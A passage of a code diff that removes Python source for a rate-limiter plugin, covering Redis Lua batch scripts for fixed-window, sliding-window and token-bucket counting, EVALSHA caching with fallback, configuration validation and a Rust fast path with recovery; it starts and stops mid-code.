single EVAL/EVALSHA call. In Redis Cluster, all keys in a single script - # must hash to the same slot. The key format `{prefix}:{dim}:{window}` - # does NOT use hash tags, so these scripts will fail on Redis Cluster. - # Use standalone Redis or Sentinel for multi-dimension batch evaluation. - - # Batch fixed window: N keys, N windows in ARGV. - # KEYS: [key1..keyN] ARGV: [window1..windowN] - # Returns: [[count1,ttl1], ..., [countN,ttlN]] - _LUA_BATCH_FIXED = """ -local results = {} -for i = 1, #KEYS do - local current = redis.call('INCR', KEYS[i]) - if current == 1 then - redis.call('EXPIRE', KEYS[i], ARGV[i]) - end - local ttl = redis.call('TTL', KEYS[i]) - results[i] = {current, ttl} -end -return results -""" - - # Batch sliding window: N keys. - # KEYS: [key1..keyN] ARGV: [now, window1, limit1, member1, window2, limit2, member2, ...] - # Returns: [[allowed,count,oldest_ts], ...] - _LUA_BATCH_SLIDING = """ -local now = tonumber(ARGV[1]) -local results = {} -for i = 1, #KEYS do - local base = 1 + (i-1)*3 + 1 - local window = tonumber(ARGV[base]) - local limit = tonumber(ARGV[base+1]) - local member = ARGV[base+2] - local cutoff = now - window - redis.call('ZREMRANGEBYSCORE', KEYS[i], '-inf', cutoff) - local count = tonumber(redis.call('ZCARD', KEYS[i])) - redis.call('EXPIRE', KEYS[i], window + 1) - if count >= limit then - local oldest = redis.call('ZRANGE', KEYS[i], 0, 0, 'WITHSCORES') - local oldest_ts = 0 - if #oldest > 0 then oldest_ts = tonumber(oldest[2]) end - results[i] = {0, count, oldest_ts} - else - redis.call('ZADD', KEYS[i], now, member) - count = count + 1 - local oldest = redis.call('ZRANGE', KEYS[i], 0, 0, 'WITHSCORES') - local oldest_ts = 0 - if #oldest > 0 then oldest_ts = tonumber(oldest[2]) end - results[i] = {1, count, oldest_ts} - end -end -return results -""" - - # Batch token bucket: N keys. - # KEYS: [key1..keyN] ARGV: [now, capacity1, rate1, capacity2, rate2, ...] - # Returns: [[allowed,remaining,time_to_next], ...] - _LUA_BATCH_TOKEN_BUCKET = """ -local now = tonumber(ARGV[1]) -local results = {} -for i = 1, #KEYS do - local base = 1 + (i-1)*2 + 1 - local capacity = tonumber(ARGV[base]) - local rate = tonumber(ARGV[base+1]) - local data = redis.call('HMGET', KEYS[i], 'tokens', 'last_refill') - local tokens = tonumber(data[1]) - local last_refill = tonumber(data[2]) - if tokens == nil then - tokens = capacity - 1 - redis.call('HSET', KEYS[i], 'tokens', tokens, 'last_refill', now) - local ttl = math.ceil(capacity / rate) + 1 - redis.call('EXPIRE', KEYS[i], ttl) - results[i] = {1, math.floor(tokens), 0} - else - local elapsed = now - last_refill - tokens = math.min(capacity, tokens + elapsed * rate) - local allowed, time_to_next - if tokens >= 1.0 then - tokens = tokens - 1.0 - allowed = 1 - time_to_next = 0 - else - allowed = 0 - time_to_next = math.ceil((1.0 - tokens) / rate) - end - redis.call('HSET', KEYS[i], 'tokens', tokens, 'last_refill', now) - local ttl = math.ceil((capacity - tokens) / rate) + 1 - redis.call('EXPIRE', KEYS[i], ttl) - results[i] = {allowed, math.floor(tokens), time_to_next} - end -end -return results -""" - - def __init__( - self, - redis_url: str, - key_prefix: str = "rl", - algorithm_name: str = ALGORITHM_FIXED_WINDOW, - fallback: Optional[MemoryBackend] = None, - _client: Any = None, - ) -> None: - """Initialise the Redis backend with connection URL, key prefix, algorithm, and optional fallback. - - Args: - redis_url: Redis connection URL (e.g. ``"redis://localhost:6379/0"``). - key_prefix: Namespace prefix for all Redis keys. - algorithm_name: Counting algorithm name (``fixed_window``, ``sliding_window``, or ``token_bucket``). - fallback: Optional in-memory backend used when Redis is unavailable. - _client: Injected Redis client for testing; ``None`` for production. - """ - self._url = redis_url - self._prefix = key_prefix - self._algorithm_name = algorithm_name - self._fallback = fallback - self._client = _client - self._real_client: Any = None - # REDIS-02: SHA cache for EVALSHA — loaded once at first use, never on request path. - self._sha_fixed: Optional[str] = None - self._sha_sliding: Optional[str] = None - self._sha_token_bucket: Optional[str] = None - self._sha_batch_fixed: Optional[str] = None - self._sha_batch_sliding: Optional[str] = None - self._sha_batch_token_bucket: Optional[str] = None - self._scripts_loaded: bool = False - self._script_load_lock: Optional[asyncio.Lock] = None - - async def _get_client(self) -> Any: - """Return the Redis client, lazily initialising a real connection if needed. - - Returns: - An async Redis client instance. - """ - if self._client is not None: - return self._client - if self._real_client is None: - # Third-Party - import redis.asyncio as aioredis # noqa: PLC0415 - - self._real_client = aioredis.from_url(self._url, decode_responses=True, max_connections=50, socket_timeout=5, socket_connect_timeout=5) - return self._real_client - - async def _ensure_scripts_loaded(self, client: Any) -> None: - """REDIS-02: Load all Lua scripts once via SCRIPT LOAD and cache their SHAs. - - Subsequent calls are no-ops once all SHAs are cached. EVALSHA is then used on - every request path instead of EVAL — O(1) SHA lookup vs. re-parsing the script. - Only caches the result when `script_load` returns a real string SHA (guards - against test mock clients that return Mock objects). - - Uses an asyncio.Lock to serialise the one-time loading and prevent - duplicate SCRIPT LOAD round-trips under concurrent coroutines. - - Args: - client: Async Redis client instance. - """ - if self._scripts_loaded: - return - if self._script_load_lock is None: - self._script_load_lock = asyncio.Lock() - async with self._script_load_lock: - if self._scripts_loaded: - return - pairs = ( - ("_sha_fixed", self._LUA_FIXED), - ("_sha_sliding", self._LUA_SLIDING), - ("_sha_token_bucket", self._LUA_TOKEN_BUCKET), - ("_sha_batch_fixed", self._LUA_BATCH_FIXED), - ("_sha_batch_sliding", self._LUA_BATCH_SLIDING), - ("_sha_batch_token_bucket", self._LUA_BATCH_TOKEN_BUCKET), - ) - for attr, script in pairs: - if getattr(self, attr) is None: - result = await client.script_load(script) - if isinstance(result, str): - setattr(self, attr, result) - self._scripts_loaded = True - - async def _evalsha(self, client: Any, sha: Optional[str], script: str, numkeys: int, *args: Any) -> Any: - """REDIS-02: Execute via EVALSHA when SHA is cached; fall back to EVAL otherwise. - - Falls back to EVAL when: - - sha is None (script not yet loaded — first call before Redis responds, or test mock) - - NOSCRIPT error (Redis restarted and flushed its script cache) - After a NOSCRIPT fallback, reloads the SHA so the next call uses EVALSHA again. - - Args: - client: Async Redis client instance. - sha: Cached script SHA, or ``None`` if not yet loaded. - script: Full Lua script text (used as EVAL fallback). - numkeys: Number of Redis keys passed to the script. - *args: Positional arguments passed as KEYS and ARGV to the script. - - Returns: - Raw result from the Redis EVALSHA or EVAL call. - - Raises: - Exception: Re-raised from Redis if the error is not a NOSCRIPT error. - """ - if sha is None: - return await client.eval(script, numkeys, *args) - try: - return await client.evalsha(sha, numkeys, *args) - except Exception as exc: - if "NOSCRIPT" in str(exc): - logger.warning("EVALSHA cache miss (NOSCRIPT); falling back to EVAL and reloading SHA") - # Allow _ensure_scripts_loaded to bulk-reload all SHAs next request. - self._scripts_loaded = False - result = await client.eval(script, numkeys, *args) - try: - new_sha = await client.script_load(script) - if isinstance(new_sha, str): - for attr, s in ( - ("_sha_fixed", self._LUA_FIXED), - ("_sha_sliding", self._LUA_SLIDING), - ("_sha_token_bucket", self._LUA_TOKEN_BUCKET), - ("_sha_batch_fixed", self._LUA_BATCH_FIXED), - ("_sha_batch_sliding", self._LUA_BATCH_SLIDING), - ("_sha_batch_token_bucket", self._LUA_BATCH_TOKEN_BUCKET), - ): - if s.strip() == script.strip(): - setattr(self, attr, new_sha) - break - except Exception: - logger.warning("EVALSHA SHA reload failed; subsequent calls will fall back to EVAL", exc_info=True) - return result - raise - - async def allow(self, key: str, limit: Optional[str]) -> tuple[bool, int, int, dict[str, Any]]: - """Check the rate limit for *key* against *limit* using an atomic Redis Lua script. - - Args: - key: Rate-limit dimension key (e.g. ``"user:alice"``). - limit: Rate string (e.g. ``"60/m"``), or ``None`` to skip. - - Returns: - Tuple of ``(allowed, limit_count, reset_timestamp, metadata)``. - """ - if not limit: - return True, 0, 0, {"limited": False} - - count, window_seconds = _parse_rate(limit) - redis_key = f"{self._prefix}:{key}:{window_seconds}" - - try: - client = await self._get_client() - await self._ensure_scripts_loaded(client) - - if self._algorithm_name == ALGORITHM_SLIDING_WINDOW: - return await self._allow_sliding(client, redis_key, count, window_seconds) - if self._algorithm_name == ALGORITHM_TOKEN_BUCKET: - return await self._allow_token_bucket(client, redis_key, count, window_seconds) - return await self._allow_fixed(client, redis_key, count, window_seconds) - - except Exception: - logger.exception("RedisBackend.allow failed; %s", "falling back to memory" if self._fallback else "allowing request") - if self._fallback is not None: - return await self._fallback.allow(key, limit) - return True, 0, 0, {"limited": False, "error": True} - - async def _allow_fixed(self, client: Any, redis_key: str, count: int, window_seconds: int) -> tuple[bool, int, int, dict[str, Any]]: - """Run the fixed-window Lua script and return the allow/block decision. - - Args: - client: Async Redis client instance. - redis_key: Fully-qualified Redis key for this dimension. - count: Maximum allowed requests per window. - window_seconds: Window duration in seconds. - - Returns: - Tuple of ``(allowed, limit, reset_timestamp, metadata)``. - """ - result = await self._evalsha(client, self._sha_fixed, self._LUA_FIXED, 1, redis_key, window_seconds) - current_count = int(result[0]) - ttl = int(result[1]) - now = int(time.time()) - reset_timestamp = now + max(ttl, 0) - reset_in = max(ttl, 0) - remaining = max(0, count - current_count) - - if current_count > count: - return False, count, reset_timestamp, {"limited": True, "remaining": 0, "reset_in": reset_in} - return True, count, reset_timestamp, {"limited": True, "remaining": remaining, "reset_in": reset_in} - - async def _allow_sliding(self, client: Any, redis_key: str, count: int, window_seconds: int) -> tuple[bool, int, int, dict[str, Any]]: - """Run the sliding-window Lua script and return the allow/block decision. - - Args: - client: Async Redis client instance. - redis_key: Fully-qualified Redis key for this dimension. - count: Maximum allowed requests per window. - window_seconds: Window duration in seconds. - - Returns: - Tuple of ``(allowed, limit, reset_timestamp, metadata)``. - """ - now = time.time() - unique_member = f"{now}:{uuid.uuid4().hex}" - result = await self._evalsha(client, self._sha_sliding, self._LUA_SLIDING, 1, redis_key, now, window_seconds, count, unique_member) - allowed_int = int(result[0]) - current_count = int(result[1]) - oldest_ts = float(result[2]) if result[2] else now - reset_timestamp = int(oldest_ts + window_seconds) - reset_in = max(0, int(reset_timestamp - now)) - remaining = max(0, count - current_count) - - if not allowed_int: - return False, count, reset_timestamp, {"limited": True, "remaining": 0, "reset_in": max(1, reset_in)} - return True, count, reset_timestamp, {"limited": True, "remaining": remaining, "reset_in": reset_in} - - async def _allow_token_bucket(self, client: Any, redis_key: str, count: int, window_seconds: int) -> tuple[bool, int, int, dict[str, Any]]: - """Run the token-bucket Lua script and return the allow/block decision. - - Args: - client: Async Redis client instance. - redis_key: Fully-qualified Redis key for this dimension. - count: Bucket capacity (max tokens). - window_seconds: Refill period in seconds. - - Returns: - Tuple of ``(allowed, limit, reset_timestamp, metadata)``. - """ - now = time.time() - refill_rate = count / window_seconds # tokens per second - result = await self._evalsha(client, self._sha_token_bucket, self._LUA_TOKEN_BUCKET, 1, redis_key, count, refill_rate, now) - allowed_int = int(result[0]) - remaining = int(result[1]) - time_to_next = int(result[2]) - - if not allowed_int: - reset_timestamp = int(now + time_to_next) - return False, count, reset_timestamp, {"limited": True, "remaining": 0, "reset_in": time_to_next} - - # Compute time-to-full consistent with the memory backend: tokens_needed / refill_rate. - # Use max(1, ...) so sub-second refill times round up to a future integer timestamp. - tokens_needed = count - remaining - time_to_full = max(1, int(tokens_needed / refill_rate)) if tokens_needed > 0 else 0 - reset_timestamp = int(now + time_to_full) - return True, count, reset_timestamp, {"limited": True, "remaining": remaining, "reset_in": time_to_full} - - async def allow_many(self, checks: List[Tuple[str, str]]) -> List[tuple[bool, int, int, dict[str, Any]]]: - """Batch all dimension checks into a single Redis eval call (REDIS-01, REDIS-03). - - Args: - checks: List of (dimension_key, rate_str) pairs, e.g. [("user:alice", "10/s")]. - - Returns: - One (allowed, limit, reset_timestamp, metadata) tuple per input check. - """ - no_limit: tuple[bool, int, int, dict[str, Any]] = (True, 0, 0, {"limited": False}) - active_indices = [i for i, (_, limit) in enumerate(checks) if limit] - if not active_indices: - return [no_limit] * len(checks) - - active = [checks[i] for i in active_indices] - parsed: List[Tuple[str, int, int]] = [(key, *_parse_rate(limit)) for key, limit in active] # type: ignore[misc] - redis_keys = [f"{self._prefix}:{key}:{window}" for key, _count, window in parsed] - - try: - client = await self._get_client() - await self._ensure_scripts_loaded(client) - if self._algorithm_name == ALGORITHM_SLIDING_WINDOW: - active_results = await self._allow_many_sliding(client, parsed, redis_keys) - elif self._algorithm_name == ALGORITHM_TOKEN_BUCKET: - active_results = await self._allow_many_token_bucket(client, parsed, redis_keys) - else: - active_results = await self._allow_many_fixed(client, parsed, redis_keys) - - except Exception: - logger.exception("RedisBackend.allow_many failed; %s", "falling back to memory" if self._fallback else "allowing request") - if self._fallback is not None: - active_results = [await self._fallback.allow(key, limit) for key, limit in active] - else: - no_limit_error: tuple[bool, int, int, dict[str, Any]] = (True, 0, 0, {"limited": False, "error": True}) - active_results = [no_limit_error] * len(active) - - # Map active results back to the full input list. - results: List[tuple[bool, int, int, dict[str, Any]]] = [no_limit] * len(checks) - for idx, result in zip(active_indices, active_results): - results[idx] = result - return results - - async def _allow_many_fixed(self, client: Any, parsed: List[Tuple[str, int, int]], redis_keys: List[str]) -> List[tuple[bool, int, int, dict[str, Any]]]: - """Batch fixed-window: one eval call for all N dimensions. - - Args: - client: Async Redis client instance. - parsed: List of ``(dimension_key, count, window_seconds)`` tuples. - redis_keys: Pre-built Redis keys corresponding to *parsed*. - - Returns: - One ``(allowed, limit, reset_timestamp, metadata)`` tuple per dimension. - """ - argv = [str(window) for _, _, window in parsed] - raw = await self._evalsha(client, self._sha_batch_fixed, self._LUA_BATCH_FIXED, len(parsed), *redis_keys, *argv) - now = int(time.time()) - results = [] - for i, (_key, count, _window) in enumerate(parsed): - current_count = int(raw[i][0]) - ttl = int(raw[i][1]) - reset_timestamp = now + max(ttl, 0) - reset_in = max(ttl, 0) - remaining = max(0, count - current_count) - if current_count > count: - results.append((False, count, reset_timestamp, {"limited": True, "remaining": 0, "reset_in": reset_in})) - else: - results.append((True, count, reset_timestamp, {"limited": True, "remaining": remaining, "reset_in": reset_in})) - return results - - async def _allow_many_sliding(self, client: Any, parsed: List[Tuple[str, int, int]], redis_keys: List[str]) -> List[tuple[bool, int, int, dict[str, Any]]]: - """Batch sliding-window: one eval call for all N dimensions. - - Args: - client: Async Redis client instance. - parsed: List of ``(dimension_key, count, window_seconds)`` tuples. - redis_keys: Pre-built Redis keys corresponding to *parsed*. - - Returns: - One ``(allowed, limit, reset_timestamp, metadata)`` tuple per dimension. - """ - now = time.time() - argv: List[Any] = [now] - for _key, count, window in parsed: - argv += [window, count, f"{now}:{uuid.uuid4().hex}"] - raw = await self._evalsha(client, self._sha_batch_sliding, self._LUA_BATCH_SLIDING, len(parsed), *redis_keys, *argv) - results = [] - for i, (_key, count, window) in enumerate(parsed): - allowed_int = int(raw[i][0]) - current_count = int(raw[i][1]) - oldest_ts = float(raw[i][2]) if raw[i][2] else now - reset_timestamp = int(oldest_ts + window) - reset_in = max(0, int(reset_timestamp - now)) - remaining = max(0, count - current_count) - if not allowed_int: - results.append((False, count, reset_timestamp, {"limited": True, "remaining": 0, "reset_in": max(1, reset_in)})) - else: - results.append((True, count, reset_timestamp, {"limited": True, "remaining": remaining, "reset_in": reset_in})) - return results - - async def _allow_many_token_bucket(self, client: Any, parsed: List[Tuple[str, int, int]], redis_keys: List[str]) -> List[tuple[bool, int, int, dict[str, Any]]]: - """Batch token-bucket: one eval call for all N dimensions. - - Args: - client: Async Redis client instance. - parsed: List of ``(dimension_key, count, window_seconds)`` tuples. - redis_keys: Pre-built Redis keys corresponding to *parsed*. - - Returns: - One ``(allowed, limit, reset_timestamp, metadata)`` tuple per dimension. - """ - now = time.time() - argv: List[Any] = [now] - for _key, count, window in parsed: - refill_rate = count / window - argv += [count, refill_rate] - raw = await self._evalsha(client, self._sha_batch_token_bucket, self._LUA_BATCH_TOKEN_BUCKET, len(parsed), *redis_keys, *argv) - results = [] - for i, (_key, count, window) in enumerate(parsed): - refill_rate = count / window - allowed_int = int(raw[i][0]) - remaining = int(raw[i][1]) - time_to_next = int(raw[i][2]) - if not allowed_int: - reset_timestamp = int(now + time_to_next) - results.append((False, count, reset_timestamp, {"limited": True, "remaining": 0, "reset_in": time_to_next})) - else: - tokens_needed = count - remaining - time_to_full = max(1, int(tokens_needed / refill_rate)) if tokens_needed > 0 else 0 - reset_timestamp = int(now + time_to_full) - results.append((True, count, reset_timestamp, {"limited": True, "remaining": remaining, "reset_in": time_to_full})) - return results - - -# --------------------------------------------------------------------------- -# Config -# --------------------------------------------------------------------------- - - -class RateLimiterConfig(BaseModel): - """Configuration for the rate limiter plugin. - - Attributes: - by_user: Rate limit per user (e.g., '60/m'). - by_tenant: Rate limit per tenant (e.g., '600/m'). - by_tool: Per-tool rate limits (e.g., {'search': '10/m'}). - algorithm: Counting algorithm — 'fixed_window', 'sliding_window', or 'token_bucket'. - backend: Storage backend — 'memory' (default) or 'redis'. - redis_url: Redis connection URL, required when backend='redis'. - redis_key_prefix: Prefix for all Redis keys (default 'rl'). - redis_fallback: Fall back to in-process memory if Redis is unavailable (default True). - """ - - by_user: Optional[str] = Field(default=None, description="e.g. '60/m'") - by_tenant: Optional[str] = Field(default=None, description="e.g. '600/m'") - by_tool: Optional[Dict[str, str]] = Field(default=None, description="per-tool rates, e.g. {'search': '10/m'}") - algorithm: str = Field(default=ALGORITHM_FIXED_WINDOW, description="'fixed_window', 'sliding_window', or 'token_bucket'") - backend: str = Field(default="memory", description="'memory' or 'redis'") - redis_url: Optional[str] = Field(default=None, description="Redis URL, e.g. 'redis://localhost:6379/0'") - redis_key_prefix: str = Field(default="rl", description="Prefix for Redis keys") - redis_fallback: bool = Field(default=True, description="Fall back to memory if Redis is unavailable") - - -# --------------------------------------------------------------------------- -# Plugin -# --------------------------------------------------------------------------- - - -class RateLimiterPlugin(Plugin): - """Rate limiter with pluggable algorithm (fixed_window, sliding_window, token_bucket).""" - - def __init__(self, config: PluginConfig) -> None: - """Initialise the plugin, parse config, and set up the rate limiting backend. - - Args: - config: Plugin configuration from the plugin framework. - """ - super().__init__(config) - self._cfg = RateLimiterConfig(**(config.config or {})) - self._rust_consecutive_failures: int = 0 - self._rust_failure_lock = threading.Lock() - self._rust_disabled_at: Optional[float] = None # monotonic time when engine was disabled - self._rust_recovery_interval: float = 60.0 # seconds before attempting re-enable - self._failopen_error_count: int = 0 # total fail-open events for observability - self._validate_config() - - # Pre-compute normalised by_tool keys once — used on every hook call. - self._normalised_by_tool: Dict[str, str] = {k.strip().lower(): v for k, v in self._cfg.by_tool.items()} if self._cfg.by_tool else {} - - # Rust engine — handles both memory and Redis backends when available. - # For Redis: Rust owns the connection and fires batch Lua scripts directly, - # keeping the shared counter semantics required for multi-instance deployments. - # Pre-parse limits here so the hot path never does string parsing (IFACE-01). - self._rust_engine: Optional[Any] = None - if _RUST_AVAILABLE: - try: - rust_config: Dict[str, Any] = { - "by_user": self._cfg.by_user, - "by_tenant": self._cfg.by_tenant, - "by_tool": self._cfg.by_tool or {}, - "algorithm": self._cfg.algorithm, - "backend": self._cfg.backend, - } - if self._cfg.backend == "redis": - rust_config["redis_url"] = self._cfg.redis_url - rust_config["redis_key_prefix"] = self._cfg.redis_key_prefix - self._rust_engine = RustRateLimiterEngine(rust_config) - self._rust_config = rust_config # kept for recovery re-init - # Pre-parsed (count, window_nanos) for each dimension — used to build - # the checks list passed to evaluate_many() on every hook call. - self._rust_by_user: Optional[Tuple[int, int]] = self._parse_rate_nanos(self._cfg.by_user) if self._cfg.by_user else None - self._rust_by_tenant: Optional[Tuple[int, int]] = self._parse_rate_nanos(self._cfg.by_tenant) if self._cfg.by_tenant else None - self._rust_by_tool: Dict[str, Tuple[int, int]] = {k.strip().lower(): self._parse_rate_nanos(v) for k, v in (self._cfg.by_tool or {}).items()} - logger.debug("Rate limiter using Rust engine (backend=%s, algorithm=%s)", self._cfg.backend, self._cfg.algorithm) - except Exception: - logger.error("Failed to initialise Rust rate limiter engine; falling back to Python backend", exc_info=True) - self._rust_engine = None - - algorithm = _make_algorithm(self._cfg.algorithm) - - if self._cfg.backend == "redis": - fallback_backend = MemoryBackend(_make_algorithm(self._cfg.algorithm)) if self._cfg.redis_fallback else None - self._rate_backend: MemoryBackend | RedisBackend = RedisBackend( - redis_url=self._cfg.redis_url, - key_prefix=self._cfg.redis_key_prefix, - algorithm_name=self._cfg.algorithm, - fallback=fallback_backend, - ) - else: - self._rate_backend = MemoryBackend(algorithm) - - def _validate_config(self) -> None: - """Validate rate strings and algorithm/backend settings; raise ValueError on error. - - Raises: - ValueError: If any rate string is malformed or settings are invalid. - """ - errors: list[str] = [] - - if self._cfg.algorithm not in VALID_ALGORITHMS: - errors.append(f"algorithm={self._cfg.algorithm!r}: must be one of {VALID_ALGORITHMS}") - - if self._cfg.backend not in ("memory", "redis"): - errors.append(f"backend={self._cfg.backend!r}: must be 'memory' or 'redis'") - - if self._cfg.backend == "redis" and not self._cfg.redis_url: - errors.append("redis_url is required when backend='redis'") - - for field_name, value in [("by_user", self._cfg.by_user), ("by_tenant", self._cfg.by_tenant)]: - if value is not None: - try: - _parse_rate(value) - except ValueError as exc: - errors.append(f"{field_name}={value!r}: {exc}") - - if self._cfg.by_tool: - normalised_keys: set[str] = set() - for tool_name, rate in self._cfg.by_tool.items(): - try: - _parse_rate(rate) - except ValueError as exc: - errors.append(f"by_tool[{tool_name!r}]={rate!r}: {exc}") - norm_key = tool_name.strip().lower() - if norm_key in normalised_keys: - errors.append(f"by_tool has duplicate key after normalisation: {tool_name!r} -> {norm_key!r}") - normalised_keys.add(norm_key) - - if errors: - raise ValueError("RateLimiterPlugin config errors: " + "; ".join(errors)) - - @staticmethod - def _parse_rate_nanos(rate: str) -> Tuple[int, int]: - """Parse a rate string and return (count, window_nanos). - - Args: - rate: Rate string (e.g. ``"60/m"``). - - Returns: - Tuple of ``(count, window_nanos)``. - """ - count, window_secs = _parse_rate(rate) - return count, window_secs * 1_000_000_000 - - def _build_rust_checks(self, user: str, tenant: Optional[str], tool: str) -> List[Tuple[str, int, int]]: - """Build the checks list for evaluate_many() from the current request context. - - Python extracts context; Rust engine does all rate math (ARCH-03). - None tenant is excluded — no check added (CORR-04). - - Args: - user: Normalised user identity string. - tenant: Tenant identifier, or ``None`` to skip the tenant dimension. - tool: Lowercased tool or prompt name. - - Returns: - List of ``(key, limit_count, window_nanos)`` tuples for active dimensions. - """ - checks: List[Tuple[str, int, int]] = [] - if self._rust_by_user: - count, window_nanos = self._rust_by_user - checks.append((f"user:{user}", count, window_nanos)) - if tenant and self._rust_by_tenant: - count, window_nanos = self._rust_by_tenant - checks.append((f"tenant:{tenant}", count, window_nanos)) - if tool in self._rust_by_tool: - count, window_nanos = self._rust_by_tool[tool] - checks.append((f"tool:{tool}", count, window_nanos)) - return checks - - def _rust_to_plugin_headers(self, result: Any, include_retry_after: bool) -> dict[str, str]: - """Convert an EvalResult to HTTP rate-limit headers (CORR-02). - - Args: - result: Rust ``EvalResult`` instance. - include_retry_after: Whether to include ``Retry-After`` in the headers. - - Returns: - Dictionary of HTTP rate-limit headers. - """ - retry_after = result.retry_after if result.retry_after is not None else 0 - return _make_headers(result.limit, result.remaining, result.reset_timestamp, retry_after, include_retry_after) - - def _rust_to_plugin_meta(self, result: Any) -> dict[str, Any]: - """Convert a Rust EvalResult into the same metadata shape as the Python path. - - Args: - result: Rust ``EvalResult`` instance. - - Returns: - Plugin metadata dict with ``limited``, ``remaining``, ``reset_in``, and ``dimensions``. - """ - - def _dimension_meta(dim: Any) -> dict[str, Any]: - """Convert a single Rust dimension result into Python plugin metadata. - - Args: - dim: Rust ``EvalDimension`` instance. - - Returns: - Metadata dict for a single dimension. - """ - reset_in = dim.retry_after if dim.retry_after is not None else max(0, int(dim.reset_timestamp) - int(time.time())) - return { - "limited": True, - "remaining": int(dim.remaining), - "reset_in": reset_in, - } - - reset_in = result.retry_after if result.retry_after is not None else max(0, int(result.reset_timestamp) - int(time.time())) - meta: dict[str, Any] = { - "limited": True, - "remaining": int(result.remaining), - "reset_in": reset_in, - } - if not result.allowed: - meta["dimensions"] = { - "violated": [_dimension_meta(dim) for dim in result.violated_dimensions], - "allowed": [_dimension_meta(dim) for dim in result.allowed_dimensions], - } - elif result.allowed_dimensions: - meta["dimensions"] = { - "allowed": [_dimension_meta(dim) for dim in result.allowed_dimensions], - } - return meta - - def _should_fallback_to_python_redis(self) -> bool: - """Return True when Redis-backed Rust errors should drop to Python fallback. - - Returns: - Whether the Python Redis backend is available as a fallback. - """ - return self._cfg.backend == "redis" and self._cfg.redis_fallback and isinstance(self._rate_backend, RedisBackend) - - def _should_use_async_rust_redis(self) -> bool: - """Return True when the Rust Redis fast path should use the async bridge. - - Returns: - Whether the backend is Redis (requiring the async code path). - """ - return self._cfg.backend == "redis" - - async def _check_rust_fast_path(self, user: str, tenant: Optional[str], entity: str, hook_name: str) -> Optional[Tuple[bool, Optional[Dict[str, str]], Dict[str, Any]]]: - """Attempt rate evaluation via the Rust engine (ARCH-01). - - Args: - user: Normalised user identity string. - tenant: Tenant identifier, or ``None`` to skip the tenant dimension. - entity: Lowercased tool or prompt name. - hook_name: Hook identifier for logging. - - Returns: - The ``(allowed, headers, meta)`` tuple on success, or ``None`` to - fall through to the Python path. - """ - try: - now_unix = int(time.time()) - if self._should_use_async_rust_redis(): - allowed, headers, meta = await self._rust_engine.check_async(user, tenant, entity, now_unix, True) - else: - allowed, headers, meta = self._rust_engine.check(user, tenant, entity, now_unix, True) - except Exception: - with self._rust_failure_lock: - self._rust_consecutive_failures += 1 - failures = self._rust_consecutive_failures - if failures >= 10: - logger.error( - "Rust rate limiter disabled after %d consecutive failures during %s; will attempt recovery in %.0fs", - failures, - hook_name, - self._rust_recovery_interval, - exc_info=True, - ) - self._rust_engine = None - self._rust_disabled_at = time.monotonic() - else: - logger.warning( - "Rust rate limiter failed during %s (%d/%d before disable); %s", - hook_name, - failures, - 10, - "falling back to Python Redis backend" if self._should_fallback_to_python_redis() else "falling through to Python path", - exc_info=True, - ) - return None - - with self._rust_failure_lock: - self._rust_consecutive_failures = 0 - if meta.get("limited") is False: - return True, None, meta - if not allowed: - return False, headers, meta - headers.pop("Retry-After", None) - return True, headers, meta - - def _maybe_recover_rust_engine(self) -> None: - """Attempt to re-initialise the Rust engine after a timed backoff.""" - if self._rust_disabled_at is None or not _RUST_AVAILABLE: - return - if time.monotonic() - self._rust_disabled_at < self._rust_recovery_interval: - return - try: - self._rust_engine = RustRateLimiterEngine(self._rust_config) - with self._rust_failure_lock: - self._rust_consecutive_failures = 0 - self._rust_disabled_at = None - logger.info("Rust rate limiter engine recovered after backoff") - except Exception: - # Push the next recovery attempt out by another interval. - self._rust_disabled_at = time.monotonic() - logger.warning("Rust rate limiter recovery failed; will retry in %.0fs", self._rust_recovery_interval, exc_info=True) - - async def _check_python_fallback(self, user: str, tenant: Optional[str], entity: str) -> Tuple[bool, Optional[Dict[str, str]], Dict[str, Any]]: - """Rate evaluation via the Python backend (ARCH-05: fallback). - - Args: - user: Normalised user identity string. - tenant: Tenant identifier, or ``None`` to skip the tenant dimension. - entity: Lowercased tool or prompt name. - - Returns: - Tuple of ``(allowed, headers, meta)``. - """ - checks: List[Tuple[str, str]] = [] - if self._cfg.by_user: - checks.append((f"user:{user}", self._cfg.by_user)) - if tenant and self._cfg.by_tenant: - checks.append((f"tenant:{tenant}", self._cfg.by_tenant)) - if self._normalised_by_tool and entity in self._normalised_by_tool: - checks.append((f"tool:{entity}", self._normalised_by_tool[entity])) - - if not checks: - return True, None, {"limited": False} - - if isinstance(self._rate_backend, RedisBackend): - results = await self._rate_backend.allow_many(checks) - else: - results = [await self._rate_backend.allow(key, limit) for key, limit in checks] - - allowed, limit, remaining, reset_ts, meta = _select_most_restrictive(results) - retry_after = meta.get("reset_in", 0) - - if not allowed: - headers = _make_headers(limit, remaining, reset_ts, retry_after, include_retry_after=True) - return False, headers, meta - - if limit > 0: - headers = _make_headers(limit, remaining, reset_ts, retry_after, include_retry_after=False) - return True, headers, meta - - return True, None, meta - - async def _check_rate_limit(self, user: str, tenant: Optional[str], entity: str, hook_name: str) -> Tuple[bool, Optional[Dict[str, str]], Dict[str, Any]]: - """Core rate-limit evaluation shared by prompt_pre_fetch and tool_pre_invoke. - - Args: - user: Normalised user identity string. - tenant: Tenant identifier, or ``None`` to skip the tenant dimension. - entity: Lowercased tool or prompt name. - hook_name: Hook identifier for logging (e.g. ``"tool_pre_invoke"``). - - Returns: - Tuple of ``(allowed, headers, meta)`` where *headers* is ``None`` - when no limits are configured and includes ``Retry-After`` only when blocked. - """ - if self._rust_engine is None and self._rust_disabled_at is not None: - self._maybe_recover_rust_engine() - - if self._rust_engine is not None: - result = await self._check_rust_fast_path(user, tenant, entity, hook_name) - if result is not None: - return result - - return await self._check_python_fallback(user, tenant, entity) - - async def _dispatch_hook(self, entity: str, context: PluginContext, hook_name: str, entity_label: str, result_cls: type) -> Any: - """Shared rate-limit dispatch for both hook methods. - - Extracts user/tenant from *context*, evaluates limits for *entity*, - and returns the appropriate *result_cls* instance. Fail-open on any - unexpected error (see module docstring "Security contract"). - - Args: - entity: Lowercased tool or prompt name being rate-limited. - context: Plugin context carrying user, tenant, and request state. - hook_name: Hook identifier for logging (e.g. ``"tool_pre_invoke"``). - entity_label: Human-readable label for error messages (``"tool"`` or ``"prompt"``). - result_cls: Result class to instantiate (``ToolPreInvokeResult`` or ``PromptPrehookResult``). - - Returns: - An instance of *result_cls*, either allowing the request or containing a violation. - """ - try: - user = _extract_user_identity(context.global_context.user) - tenant = str(context.global_context.tenant_id).strip() if context.global_context.tenant_id else None - - allowed, headers, meta = await self._check_rate_limit(user, tenant, entity, hook_name) - - if not allowed: - return 